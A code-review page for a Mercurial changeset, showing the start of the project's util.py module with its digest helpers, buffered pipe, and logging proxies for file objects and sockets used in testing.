##// END OF EJS Templates
util: make capacity a public attribute on lrucachedict...
Gregory Szorc -
r39600:5d75a3c1 default
parent child Browse files
Show More
@@ -1,3885 +1,3885 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def bitsfrom(container):
139 139 bits = 0
140 140 for bit in container:
141 141 bits |= bit
142 142 return bits
143 143
144 144 # python 2.6 still have deprecation warning enabled by default. We do not want
145 145 # to display anything to standard user so detect if we are running test and
146 146 # only use python deprecation warning in this case.
147 147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 148 if _dowarn:
149 149 # explicitly unfilter our warning for python 2.7
150 150 #
151 151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 152 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 153 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 154 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 158 if _dowarn and pycompat.ispy3:
159 159 # silence warning emitted by passing user string to re.sub()
160 160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 161 r'mercurial')
162 162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 163 DeprecationWarning, r'mercurial')
164 164 # TODO: reinvent imp.is_frozen()
165 165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 166 DeprecationWarning, r'mercurial')
167 167
168 168 def nouideprecwarn(msg, version, stacklevel=1):
169 169 """Issue an python native deprecation warning
170 170
171 171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 172 """
173 173 if _dowarn:
174 174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 175 " update your code.)") % version
176 176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 177
178 178 DIGESTS = {
179 179 'md5': hashlib.md5,
180 180 'sha1': hashlib.sha1,
181 181 'sha512': hashlib.sha512,
182 182 }
183 183 # List of digest types from strongest to weakest
184 184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 185
186 186 for k in DIGESTS_BY_STRENGTH:
187 187 assert k in DIGESTS
188 188
189 189 class digester(object):
190 190 """helper to compute digests.
191 191
192 192 This helper can be used to compute one or more digests given their name.
193 193
194 194 >>> d = digester([b'md5', b'sha1'])
195 195 >>> d.update(b'foo')
196 196 >>> [k for k in sorted(d)]
197 197 ['md5', 'sha1']
198 198 >>> d[b'md5']
199 199 'acbd18db4cc2f85cedef654fccc4a4d8'
200 200 >>> d[b'sha1']
201 201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 202 >>> digester.preferred([b'md5', b'sha1'])
203 203 'sha1'
204 204 """
205 205
206 206 def __init__(self, digests, s=''):
207 207 self._hashes = {}
208 208 for k in digests:
209 209 if k not in DIGESTS:
210 210 raise error.Abort(_('unknown digest type: %s') % k)
211 211 self._hashes[k] = DIGESTS[k]()
212 212 if s:
213 213 self.update(s)
214 214
215 215 def update(self, data):
216 216 for h in self._hashes.values():
217 217 h.update(data)
218 218
219 219 def __getitem__(self, key):
220 220 if key not in DIGESTS:
221 221 raise error.Abort(_('unknown digest type: %s') % k)
222 222 return nodemod.hex(self._hashes[key].digest())
223 223
224 224 def __iter__(self):
225 225 return iter(self._hashes)
226 226
227 227 @staticmethod
228 228 def preferred(supported):
229 229 """returns the strongest digest type in both supported and DIGESTS."""
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 if k in supported:
233 233 return k
234 234 return None
235 235
236 236 class digestchecker(object):
237 237 """file handle wrapper that additionally checks content against a given
238 238 size and digests.
239 239
240 240 d = digestchecker(fh, size, {'md5': '...'})
241 241
242 242 When multiple digests are given, all of them are validated.
243 243 """
244 244
245 245 def __init__(self, fh, size, digests):
246 246 self._fh = fh
247 247 self._size = size
248 248 self._got = 0
249 249 self._digests = dict(digests)
250 250 self._digester = digester(self._digests.keys())
251 251
252 252 def read(self, length=-1):
253 253 content = self._fh.read(length)
254 254 self._digester.update(content)
255 255 self._got += len(content)
256 256 return content
257 257
258 258 def validate(self):
259 259 if self._size != self._got:
260 260 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 261 (self._size, self._got))
262 262 for k, v in self._digests.items():
263 263 if v != self._digester[k]:
264 264 # i18n: first parameter is a digest name
265 265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 266 (k, v, self._digester[k]))
267 267
268 268 try:
269 269 buffer = buffer
270 270 except NameError:
271 271 def buffer(sliceable, offset=0, length=None):
272 272 if length is not None:
273 273 return memoryview(sliceable)[offset:offset + length]
274 274 return memoryview(sliceable)[offset:]
275 275
276 276 _chunksize = 4096
277 277
278 278 class bufferedinputpipe(object):
279 279 """a manually buffered input pipe
280 280
281 281 Python will not let us use buffered IO and lazy reading with 'polling' at
282 282 the same time. We cannot probe the buffer state and select will not detect
283 283 that data are ready to read if they are already buffered.
284 284
285 285 This class let us work around that by implementing its own buffering
286 286 (allowing efficient readline) while offering a way to know if the buffer is
287 287 empty from the output (allowing collaboration of the buffer with polling).
288 288
289 289 This class lives in the 'util' module because it makes use of the 'os'
290 290 module from the python stdlib.
291 291 """
292 292 def __new__(cls, fh):
293 293 # If we receive a fileobjectproxy, we need to use a variation of this
294 294 # class that notifies observers about activity.
295 295 if isinstance(fh, fileobjectproxy):
296 296 cls = observedbufferedinputpipe
297 297
298 298 return super(bufferedinputpipe, cls).__new__(cls)
299 299
300 300 def __init__(self, input):
301 301 self._input = input
302 302 self._buffer = []
303 303 self._eof = False
304 304 self._lenbuf = 0
305 305
306 306 @property
307 307 def hasbuffer(self):
308 308 """True is any data is currently buffered
309 309
310 310 This will be used externally a pre-step for polling IO. If there is
311 311 already data then no polling should be set in place."""
312 312 return bool(self._buffer)
313 313
314 314 @property
315 315 def closed(self):
316 316 return self._input.closed
317 317
318 318 def fileno(self):
319 319 return self._input.fileno()
320 320
321 321 def close(self):
322 322 return self._input.close()
323 323
324 324 def read(self, size):
325 325 while (not self._eof) and (self._lenbuf < size):
326 326 self._fillbuffer()
327 327 return self._frombuffer(size)
328 328
329 329 def unbufferedread(self, size):
330 330 if not self._eof and self._lenbuf == 0:
331 331 self._fillbuffer(max(size, _chunksize))
332 332 return self._frombuffer(min(self._lenbuf, size))
333 333
334 334 def readline(self, *args, **kwargs):
335 335 if 1 < len(self._buffer):
336 336 # this should not happen because both read and readline end with a
337 337 # _frombuffer call that collapse it.
338 338 self._buffer = [''.join(self._buffer)]
339 339 self._lenbuf = len(self._buffer[0])
340 340 lfi = -1
341 341 if self._buffer:
342 342 lfi = self._buffer[-1].find('\n')
343 343 while (not self._eof) and lfi < 0:
344 344 self._fillbuffer()
345 345 if self._buffer:
346 346 lfi = self._buffer[-1].find('\n')
347 347 size = lfi + 1
348 348 if lfi < 0: # end of file
349 349 size = self._lenbuf
350 350 elif 1 < len(self._buffer):
351 351 # we need to take previous chunks into account
352 352 size += self._lenbuf - len(self._buffer[-1])
353 353 return self._frombuffer(size)
354 354
355 355 def _frombuffer(self, size):
356 356 """return at most 'size' data from the buffer
357 357
358 358 The data are removed from the buffer."""
359 359 if size == 0 or not self._buffer:
360 360 return ''
361 361 buf = self._buffer[0]
362 362 if 1 < len(self._buffer):
363 363 buf = ''.join(self._buffer)
364 364
365 365 data = buf[:size]
366 366 buf = buf[len(data):]
367 367 if buf:
368 368 self._buffer = [buf]
369 369 self._lenbuf = len(buf)
370 370 else:
371 371 self._buffer = []
372 372 self._lenbuf = 0
373 373 return data
374 374
375 375 def _fillbuffer(self, size=_chunksize):
376 376 """read data to the buffer"""
377 377 data = os.read(self._input.fileno(), size)
378 378 if not data:
379 379 self._eof = True
380 380 else:
381 381 self._lenbuf += len(data)
382 382 self._buffer.append(data)
383 383
384 384 return data
385 385
386 386 def mmapread(fp):
387 387 try:
388 388 fd = getattr(fp, 'fileno', lambda: fp)()
389 389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 390 except ValueError:
391 391 # Empty files cannot be mmapped, but mmapread should still work. Check
392 392 # if the file is empty, and if so, return an empty buffer.
393 393 if os.fstat(fd).st_size == 0:
394 394 return ''
395 395 raise
396 396
397 397 class fileobjectproxy(object):
398 398 """A proxy around file objects that tells a watcher when events occur.
399 399
400 400 This type is intended to only be used for testing purposes. Think hard
401 401 before using it in important code.
402 402 """
403 403 __slots__ = (
404 404 r'_orig',
405 405 r'_observer',
406 406 )
407 407
408 408 def __init__(self, fh, observer):
409 409 object.__setattr__(self, r'_orig', fh)
410 410 object.__setattr__(self, r'_observer', observer)
411 411
412 412 def __getattribute__(self, name):
413 413 ours = {
414 414 r'_observer',
415 415
416 416 # IOBase
417 417 r'close',
418 418 # closed if a property
419 419 r'fileno',
420 420 r'flush',
421 421 r'isatty',
422 422 r'readable',
423 423 r'readline',
424 424 r'readlines',
425 425 r'seek',
426 426 r'seekable',
427 427 r'tell',
428 428 r'truncate',
429 429 r'writable',
430 430 r'writelines',
431 431 # RawIOBase
432 432 r'read',
433 433 r'readall',
434 434 r'readinto',
435 435 r'write',
436 436 # BufferedIOBase
437 437 # raw is a property
438 438 r'detach',
439 439 # read defined above
440 440 r'read1',
441 441 # readinto defined above
442 442 # write defined above
443 443 }
444 444
445 445 # We only observe some methods.
446 446 if name in ours:
447 447 return object.__getattribute__(self, name)
448 448
449 449 return getattr(object.__getattribute__(self, r'_orig'), name)
450 450
451 451 def __nonzero__(self):
452 452 return bool(object.__getattribute__(self, r'_orig'))
453 453
454 454 __bool__ = __nonzero__
455 455
456 456 def __delattr__(self, name):
457 457 return delattr(object.__getattribute__(self, r'_orig'), name)
458 458
459 459 def __setattr__(self, name, value):
460 460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 461
462 462 def __iter__(self):
463 463 return object.__getattribute__(self, r'_orig').__iter__()
464 464
465 465 def _observedcall(self, name, *args, **kwargs):
466 466 # Call the original object.
467 467 orig = object.__getattribute__(self, r'_orig')
468 468 res = getattr(orig, name)(*args, **kwargs)
469 469
470 470 # Call a method on the observer of the same name with arguments
471 471 # so it can react, log, etc.
472 472 observer = object.__getattribute__(self, r'_observer')
473 473 fn = getattr(observer, name, None)
474 474 if fn:
475 475 fn(res, *args, **kwargs)
476 476
477 477 return res
478 478
479 479 def close(self, *args, **kwargs):
480 480 return object.__getattribute__(self, r'_observedcall')(
481 481 r'close', *args, **kwargs)
482 482
483 483 def fileno(self, *args, **kwargs):
484 484 return object.__getattribute__(self, r'_observedcall')(
485 485 r'fileno', *args, **kwargs)
486 486
487 487 def flush(self, *args, **kwargs):
488 488 return object.__getattribute__(self, r'_observedcall')(
489 489 r'flush', *args, **kwargs)
490 490
491 491 def isatty(self, *args, **kwargs):
492 492 return object.__getattribute__(self, r'_observedcall')(
493 493 r'isatty', *args, **kwargs)
494 494
495 495 def readable(self, *args, **kwargs):
496 496 return object.__getattribute__(self, r'_observedcall')(
497 497 r'readable', *args, **kwargs)
498 498
499 499 def readline(self, *args, **kwargs):
500 500 return object.__getattribute__(self, r'_observedcall')(
501 501 r'readline', *args, **kwargs)
502 502
503 503 def readlines(self, *args, **kwargs):
504 504 return object.__getattribute__(self, r'_observedcall')(
505 505 r'readlines', *args, **kwargs)
506 506
507 507 def seek(self, *args, **kwargs):
508 508 return object.__getattribute__(self, r'_observedcall')(
509 509 r'seek', *args, **kwargs)
510 510
511 511 def seekable(self, *args, **kwargs):
512 512 return object.__getattribute__(self, r'_observedcall')(
513 513 r'seekable', *args, **kwargs)
514 514
515 515 def tell(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'tell', *args, **kwargs)
518 518
519 519 def truncate(self, *args, **kwargs):
520 520 return object.__getattribute__(self, r'_observedcall')(
521 521 r'truncate', *args, **kwargs)
522 522
523 523 def writable(self, *args, **kwargs):
524 524 return object.__getattribute__(self, r'_observedcall')(
525 525 r'writable', *args, **kwargs)
526 526
527 527 def writelines(self, *args, **kwargs):
528 528 return object.__getattribute__(self, r'_observedcall')(
529 529 r'writelines', *args, **kwargs)
530 530
531 531 def read(self, *args, **kwargs):
532 532 return object.__getattribute__(self, r'_observedcall')(
533 533 r'read', *args, **kwargs)
534 534
535 535 def readall(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readall', *args, **kwargs)
538 538
539 539 def readinto(self, *args, **kwargs):
540 540 return object.__getattribute__(self, r'_observedcall')(
541 541 r'readinto', *args, **kwargs)
542 542
543 543 def write(self, *args, **kwargs):
544 544 return object.__getattribute__(self, r'_observedcall')(
545 545 r'write', *args, **kwargs)
546 546
547 547 def detach(self, *args, **kwargs):
548 548 return object.__getattribute__(self, r'_observedcall')(
549 549 r'detach', *args, **kwargs)
550 550
551 551 def read1(self, *args, **kwargs):
552 552 return object.__getattribute__(self, r'_observedcall')(
553 553 r'read1', *args, **kwargs)
554 554
555 555 class observedbufferedinputpipe(bufferedinputpipe):
556 556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 557
558 558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 559 bypass ``fileobjectproxy``. Because of this, we need to make
560 560 ``bufferedinputpipe`` aware of these operations.
561 561
562 562 This variation of ``bufferedinputpipe`` can notify observers about
563 563 ``os.read()`` events. It also re-publishes other events, such as
564 564 ``read()`` and ``readline()``.
565 565 """
566 566 def _fillbuffer(self):
567 567 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 568
569 569 fn = getattr(self._input._observer, r'osread', None)
570 570 if fn:
571 571 fn(res, _chunksize)
572 572
573 573 return res
574 574
575 575 # We use different observer methods because the operation isn't
576 576 # performed on the actual file object but on us.
577 577 def read(self, size):
578 578 res = super(observedbufferedinputpipe, self).read(size)
579 579
580 580 fn = getattr(self._input._observer, r'bufferedread', None)
581 581 if fn:
582 582 fn(res, size)
583 583
584 584 return res
585 585
586 586 def readline(self, *args, **kwargs):
587 587 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 588
589 589 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 590 if fn:
591 591 fn(res)
592 592
593 593 return res
594 594
595 595 PROXIED_SOCKET_METHODS = {
596 596 r'makefile',
597 597 r'recv',
598 598 r'recvfrom',
599 599 r'recvfrom_into',
600 600 r'recv_into',
601 601 r'send',
602 602 r'sendall',
603 603 r'sendto',
604 604 r'setblocking',
605 605 r'settimeout',
606 606 r'gettimeout',
607 607 r'setsockopt',
608 608 }
609 609
610 610 class socketproxy(object):
611 611 """A proxy around a socket that tells a watcher when events occur.
612 612
613 613 This is like ``fileobjectproxy`` except for sockets.
614 614
615 615 This type is intended to only be used for testing purposes. Think hard
616 616 before using it in important code.
617 617 """
618 618 __slots__ = (
619 619 r'_orig',
620 620 r'_observer',
621 621 )
622 622
623 623 def __init__(self, sock, observer):
624 624 object.__setattr__(self, r'_orig', sock)
625 625 object.__setattr__(self, r'_observer', observer)
626 626
627 627 def __getattribute__(self, name):
628 628 if name in PROXIED_SOCKET_METHODS:
629 629 return object.__getattribute__(self, name)
630 630
631 631 return getattr(object.__getattribute__(self, r'_orig'), name)
632 632
633 633 def __delattr__(self, name):
634 634 return delattr(object.__getattribute__(self, r'_orig'), name)
635 635
636 636 def __setattr__(self, name, value):
637 637 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 638
639 639 def __nonzero__(self):
640 640 return bool(object.__getattribute__(self, r'_orig'))
641 641
642 642 __bool__ = __nonzero__
643 643
644 644 def _observedcall(self, name, *args, **kwargs):
645 645 # Call the original object.
646 646 orig = object.__getattribute__(self, r'_orig')
647 647 res = getattr(orig, name)(*args, **kwargs)
648 648
649 649 # Call a method on the observer of the same name with arguments
650 650 # so it can react, log, etc.
651 651 observer = object.__getattribute__(self, r'_observer')
652 652 fn = getattr(observer, name, None)
653 653 if fn:
654 654 fn(res, *args, **kwargs)
655 655
656 656 return res
657 657
658 658 def makefile(self, *args, **kwargs):
659 659 res = object.__getattribute__(self, r'_observedcall')(
660 660 r'makefile', *args, **kwargs)
661 661
662 662 # The file object may be used for I/O. So we turn it into a
663 663 # proxy using our observer.
664 664 observer = object.__getattribute__(self, r'_observer')
665 665 return makeloggingfileobject(observer.fh, res, observer.name,
666 666 reads=observer.reads,
667 667 writes=observer.writes,
668 668 logdata=observer.logdata,
669 669 logdataapis=observer.logdataapis)
670 670
671 671 def recv(self, *args, **kwargs):
672 672 return object.__getattribute__(self, r'_observedcall')(
673 673 r'recv', *args, **kwargs)
674 674
675 675 def recvfrom(self, *args, **kwargs):
676 676 return object.__getattribute__(self, r'_observedcall')(
677 677 r'recvfrom', *args, **kwargs)
678 678
679 679 def recvfrom_into(self, *args, **kwargs):
680 680 return object.__getattribute__(self, r'_observedcall')(
681 681 r'recvfrom_into', *args, **kwargs)
682 682
683 683 def recv_into(self, *args, **kwargs):
684 684 return object.__getattribute__(self, r'_observedcall')(
685 685 r'recv_info', *args, **kwargs)
686 686
687 687 def send(self, *args, **kwargs):
688 688 return object.__getattribute__(self, r'_observedcall')(
689 689 r'send', *args, **kwargs)
690 690
691 691 def sendall(self, *args, **kwargs):
692 692 return object.__getattribute__(self, r'_observedcall')(
693 693 r'sendall', *args, **kwargs)
694 694
695 695 def sendto(self, *args, **kwargs):
696 696 return object.__getattribute__(self, r'_observedcall')(
697 697 r'sendto', *args, **kwargs)
698 698
699 699 def setblocking(self, *args, **kwargs):
700 700 return object.__getattribute__(self, r'_observedcall')(
701 701 r'setblocking', *args, **kwargs)
702 702
703 703 def settimeout(self, *args, **kwargs):
704 704 return object.__getattribute__(self, r'_observedcall')(
705 705 r'settimeout', *args, **kwargs)
706 706
707 707 def gettimeout(self, *args, **kwargs):
708 708 return object.__getattribute__(self, r'_observedcall')(
709 709 r'gettimeout', *args, **kwargs)
710 710
711 711 def setsockopt(self, *args, **kwargs):
712 712 return object.__getattribute__(self, r'_observedcall')(
713 713 r'setsockopt', *args, **kwargs)
714 714
715 715 class baseproxyobserver(object):
716 716 def _writedata(self, data):
717 717 if not self.logdata:
718 718 if self.logdataapis:
719 719 self.fh.write('\n')
720 720 self.fh.flush()
721 721 return
722 722
723 723 # Simple case writes all data on a single line.
724 724 if b'\n' not in data:
725 725 if self.logdataapis:
726 726 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 727 else:
728 728 self.fh.write('%s> %s\n'
729 729 % (self.name, stringutil.escapestr(data)))
730 730 self.fh.flush()
731 731 return
732 732
733 733 # Data with newlines is written to multiple lines.
734 734 if self.logdataapis:
735 735 self.fh.write(':\n')
736 736
737 737 lines = data.splitlines(True)
738 738 for line in lines:
739 739 self.fh.write('%s> %s\n'
740 740 % (self.name, stringutil.escapestr(line)))
741 741 self.fh.flush()
742 742
743 743 class fileobjectobserver(baseproxyobserver):
744 744 """Logs file object activity."""
745 745 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 746 logdataapis=True):
747 747 self.fh = fh
748 748 self.name = name
749 749 self.logdata = logdata
750 750 self.logdataapis = logdataapis
751 751 self.reads = reads
752 752 self.writes = writes
753 753
754 754 def read(self, res, size=-1):
755 755 if not self.reads:
756 756 return
757 757 # Python 3 can return None from reads at EOF instead of empty strings.
758 758 if res is None:
759 759 res = ''
760 760
761 761 if size == -1 and res == '':
762 762 # Suppress pointless read(-1) calls that return
763 763 # nothing. These happen _a lot_ on Python 3, and there
764 764 # doesn't seem to be a better workaround to have matching
765 765 # Python 2 and 3 behavior. :(
766 766 return
767 767
768 768 if self.logdataapis:
769 769 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 770
771 771 self._writedata(res)
772 772
773 773 def readline(self, res, limit=-1):
774 774 if not self.reads:
775 775 return
776 776
777 777 if self.logdataapis:
778 778 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 779
780 780 self._writedata(res)
781 781
782 782 def readinto(self, res, dest):
783 783 if not self.reads:
784 784 return
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 788 res))
789 789
790 790 data = dest[0:res] if res is not None else b''
791 791 self._writedata(data)
792 792
793 793 def write(self, res, data):
794 794 if not self.writes:
795 795 return
796 796
797 797 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 798 # returns the integer bytes written.
799 799 if res is None and data:
800 800 res = len(data)
801 801
802 802 if self.logdataapis:
803 803 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804 804
805 805 self._writedata(data)
806 806
807 807 def flush(self, res):
808 808 if not self.writes:
809 809 return
810 810
811 811 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812 812
813 813 # For observedbufferedinputpipe.
814 814 def bufferedread(self, res, size):
815 815 if not self.reads:
816 816 return
817 817
818 818 if self.logdataapis:
819 819 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 820 self.name, size, len(res)))
821 821
822 822 self._writedata(res)
823 823
824 824 def bufferedreadline(self, res):
825 825 if not self.reads:
826 826 return
827 827
828 828 if self.logdataapis:
829 829 self.fh.write('%s> bufferedreadline() -> %d' % (
830 830 self.name, len(res)))
831 831
832 832 self._writedata(res)
833 833
834 834 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 835 logdata=False, logdataapis=True):
836 836 """Turn a file object into a logging file object."""
837 837
838 838 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 839 logdata=logdata, logdataapis=logdataapis)
840 840 return fileobjectproxy(fh, observer)
841 841
842 842 class socketobserver(baseproxyobserver):
843 843 """Logs socket activity."""
844 844 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 845 logdata=False, logdataapis=True):
846 846 self.fh = fh
847 847 self.name = name
848 848 self.reads = reads
849 849 self.writes = writes
850 850 self.states = states
851 851 self.logdata = logdata
852 852 self.logdataapis = logdataapis
853 853
854 854 def makefile(self, res, mode=None, bufsize=None):
855 855 if not self.states:
856 856 return
857 857
858 858 self.fh.write('%s> makefile(%r, %r)\n' % (
859 859 self.name, mode, bufsize))
860 860
861 861 def recv(self, res, size, flags=0):
862 862 if not self.reads:
863 863 return
864 864
865 865 if self.logdataapis:
866 866 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 867 self.name, size, flags, len(res)))
868 868 self._writedata(res)
869 869
870 870 def recvfrom(self, res, size, flags=0):
871 871 if not self.reads:
872 872 return
873 873
874 874 if self.logdataapis:
875 875 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 876 self.name, size, flags, len(res[0])))
877 877
878 878 self._writedata(res[0])
879 879
880 880 def recvfrom_into(self, res, buf, size, flags=0):
881 881 if not self.reads:
882 882 return
883 883
884 884 if self.logdataapis:
885 885 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 886 self.name, size, flags, res[0]))
887 887
888 888 self._writedata(buf[0:res[0]])
889 889
890 890 def recv_into(self, res, buf, size=0, flags=0):
891 891 if not self.reads:
892 892 return
893 893
894 894 if self.logdataapis:
895 895 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 896 self.name, size, flags, res))
897 897
898 898 self._writedata(buf[0:res])
899 899
900 900 def send(self, res, data, flags=0):
901 901 if not self.writes:
902 902 return
903 903
904 904 self.fh.write('%s> send(%d, %d) -> %d' % (
905 905 self.name, len(data), flags, len(res)))
906 906 self._writedata(data)
907 907
908 908 def sendall(self, res, data, flags=0):
909 909 if not self.writes:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 # Returns None on success. So don't bother reporting return value.
914 914 self.fh.write('%s> sendall(%d, %d)' % (
915 915 self.name, len(data), flags))
916 916
917 917 self._writedata(data)
918 918
919 919 def sendto(self, res, data, flagsoraddress, address=None):
920 920 if not self.writes:
921 921 return
922 922
923 923 if address:
924 924 flags = flagsoraddress
925 925 else:
926 926 flags = 0
927 927
928 928 if self.logdataapis:
929 929 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 930 self.name, len(data), flags, address, res))
931 931
932 932 self._writedata(data)
933 933
934 934 def setblocking(self, res, flag):
935 935 if not self.states:
936 936 return
937 937
938 938 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939 939
940 940 def settimeout(self, res, value):
941 941 if not self.states:
942 942 return
943 943
944 944 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945 945
946 946 def gettimeout(self, res):
947 947 if not self.states:
948 948 return
949 949
950 950 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951 951
952 952 def setsockopt(self, res, level, optname, value):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 957 self.name, level, optname, value, res))
958 958
959 959 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 960 logdata=False, logdataapis=True):
961 961 """Turn a socket into a logging socket."""
962 962
963 963 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 964 states=states, logdata=logdata,
965 965 logdataapis=logdataapis)
966 966 return socketproxy(fh, observer)
967 967
968 968 def version():
969 969 """Return version information if available."""
970 970 try:
971 971 from . import __version__
972 972 return __version__.version
973 973 except ImportError:
974 974 return 'unknown'
975 975
976 976 def versiontuple(v=None, n=4):
977 977 """Parses a Mercurial version string into an N-tuple.
978 978
979 979 The version string to be parsed is specified with the ``v`` argument.
980 980 If it isn't defined, the current Mercurial version string will be parsed.
981 981
982 982 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 983 returned values:
984 984
985 985 >>> v = b'3.6.1+190-df9b73d2d444'
986 986 >>> versiontuple(v, 2)
987 987 (3, 6)
988 988 >>> versiontuple(v, 3)
989 989 (3, 6, 1)
990 990 >>> versiontuple(v, 4)
991 991 (3, 6, 1, '190-df9b73d2d444')
992 992
993 993 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 994 (3, 6, 1, '190-df9b73d2d444+20151118')
995 995
996 996 >>> v = b'3.6'
997 997 >>> versiontuple(v, 2)
